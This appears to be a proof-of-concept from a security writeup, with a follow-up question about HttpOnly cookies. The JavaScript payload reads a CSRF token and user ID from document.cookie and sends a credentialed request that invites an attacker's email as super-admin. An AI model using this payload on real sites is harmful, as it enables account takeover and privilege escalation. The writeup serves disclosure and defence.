for writeup!
// Proof-of-concept from the writeup: a script running in the victim's browser
// reads two values out of document.cookie and replays them in a credentialed
// API call. Everything it needs comes from the page it runs on: both cookies
// are readable from JavaScript (so they are not HttpOnly), and the browser
// attaches the session cookies itself because withCredentials is set below.
// Defender's note: if `example-csrf` and `USER_ID` were HttpOnly, or the CSRF
// token were not kept in a JavaScript-readable cookie, the .find() calls below
// would return undefined and the script would stop at the chained .split().
var email = "ATTACKER_EMAIl"; | |
// Set the attacker email that we will receive the invitation to it. | |
// (Placeholder value in the writeup; it ends up in the JSON body sent below.)
// Split document.cookie into "name=value" pairs and take the value of the first
// pair whose name starts with 'example-csrf'. If no such cookie is visible to
// JavaScript, .find() yields undefined and .split() throws a TypeError.
var csrf= document.cookie.split('; ').find(row => row.startsWith('example-csrf')).split('=')[1]; | |
// Getting the csrf value from [example-csrf] cookie parameter and store it in the csrf variable. | |
// Same lookup for the 'USER_ID' cookie; same failure mode when it is absent.
var pid= document.cookie.split('; ').find(row => row.startsWith('USER_ID')).split('=')[1]; | |
// Getting the pid value from [USER_ID] cookie parameter and store it in the pid variable. | |
// Initiate the XHR POST request that holds the data we collect! | |
var http=new XMLHttpRequest(); | |
// The user id is placed in the query string by string concatenation; the
// remaining query parameters are fixed. Third argument `true` = asynchronous.
http.open('POST','https://api.example.com/app/v1/users/add/?Pid='+pid+'&clienttimeout=14000&app=users&version=1.0', true); | |
http.withCredentials=true; | |
// To send the victim cookies with the request! | |
// The CSRF token read from the cookie is echoed back in a request header; this
// is why a JavaScript-readable CSRF cookie defeats the header check here.
http.setRequestHeader('X-example-CSRF',csrf); | |
http.setRequestHeader('Content-type','application/json'); | |
// Setting the required headers! | |
// The JSON body is assembled by string concatenation rather than
// JSON.stringify, so `email` is inserted unescaped. The body requests the
// invited user with roleNames ["super-admin"], which is the impact the
// writeup is demonstrating.
http.send('{"users":[{"email":"'+email+'" ,"emailSent":true,"firstName":"","lastName":"","roleNames":[],"jita":false,"expiresAt":null,"primaryTeamId":-1,"secondaryTeamIds":[],"partner":false,"pending":false,"existingInexample":false,"hasTwoFactorBackupCodes":false,"hasTwoFactorConfigured":false,"userAssetsCount":null,"scim":false}],"roleNames":["super-admin"],"teamId":null,"secondaryTeamIds":[],"sendWelcomeEmail":true,"forceWelcomeEmail":true}'); |
Question: does setting the cookie with "Secure; HttpOnly;",
like so:
prevent this by not allowing JavaScript access to the secured cookie?
Maybe?
https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies#restrict_access_to_cookies
Note: I'm not sure this is the best UX, as we want our developers to be able to easily obtain a token and use it to authenticate requests. Although in any practical secure environment they will be supplied as environment variables, sometimes you wish to authenticate code manually;
therefore you should set the secure cookie yourself and forget about it, to prevent possible XSS token access.
Further, you should limit the access of each user so that a token compromise is not impactful, if possible — read-only access or two-factor authentication, maybe?